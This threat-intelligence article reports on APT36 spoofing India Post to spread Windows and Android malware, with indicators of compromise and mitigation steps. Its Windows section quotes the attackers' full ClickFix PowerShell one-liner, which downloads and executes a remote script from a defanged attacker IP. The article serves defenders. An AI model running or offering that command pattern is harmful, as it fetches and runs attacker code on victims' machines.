An advanced persistent threat (APT) group linked to Pakistan has been observed impersonating India’s postal service to distribute malware targeting both Windows and Android users. Cybersecurity firm CYFIRMA attributes the campaign with medium confidence to APT36 (also known as Transparent Tribe), a group historically active in South Asian cyber espionage. The operation involves a fake India Post website (`postindia[.]site`) delivering malicious PDFs to Windows users and a rogue Android app (`indiapost.apk`) designed to steal sensitive data.
TL;DR: Key Findings
- Campaign: APT36 spoofed India Post’s website to deliver malware via malicious PDFs (Windows) and a fake APK (Android).
- Tactics: PowerShell abuse (“ClickFix” technique) for Windows; Android app requests excessive permissions (contacts, location, files).
- Attribution: PDF metadata links to Pakistan’s “Prime Minister Youth Laptop Scheme” (PMYLS).
- IOCs: Domain: `postindia[.]site`; IP: `88.222.245[.]211`; APK hash: `cbf7457…`.
Technical Analysis
Windows Infection Chain
The attack begins with a malicious PDF hosted on the spoofed India Post website. When opened, the document instructs users to execute a PowerShell command via the Win + R dialog:
powershell -w hidden -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://88.222.245[.]211/script.ps1')"This connects to a command-and-control (C2) server, though CYFIRMA notes the server was inactive at the time of analysis. The PDF’s metadata reveals creation timestamps aligned with Pakistan’s timezone (October 2024) and references to PMYLS, a Pakistani government initiative.
Android Malware Details
The fake “indiapost.apk” mimics the Google Play Store icon and requests 11 permissions, including access to:
- Contacts
- Location
- External storage
Once installed, the app registers a BootReceiver to maintain persistence, ensuring execution after device reboots. It also promotes a fraudulent casino app (“VivaGame”) to harvest financial data. Data exfiltration occurs via domains masquerading as Google Analytics.
Mitigation and Detection
Organizations and individuals can take the following steps to mitigate risks:
| Action | Implementation |
|---|---|
| Block IOCs | Add `postindia[.]site` and `88.222.245[.]211` to deny lists. |
| Application Whitelisting | Restrict PowerShell execution to signed scripts. |
| Android Safeguards | Disable “Unknown Sources” and audit app permissions. |
Conclusion
APT36’s cross-platform campaign underscores the group’s adaptability in leveraging social engineering and trusted brands for malware distribution. The use of Pakistan-linked lures (PMYLS) reinforces geopolitical motivations. Organizations should prioritize user awareness training and technical controls to counter such threats.
References
- “[APT36 Spoofs India Post Website to Infect Windows and Android Users](https://thehackernews.com/2025/03/apt36-spoofs-india-post-website-to.html)”. The Hacker News. March 27, 2025.
- “[Turning Aid into Attack: Exploitation of Pakistan’s Youth Laptop Scheme to Target India](https://www.cyfirma.com/research/turning-aid-into-attack-exploitation-of-pakistans-youth-laptop-scheme-to-target-india/)”. CYFIRMA. [Accessed March 2025].
- “APT36’s Evolution: New ElizaRAT Malware and Cloud-Based C2”. Dark Reading. November 2024.
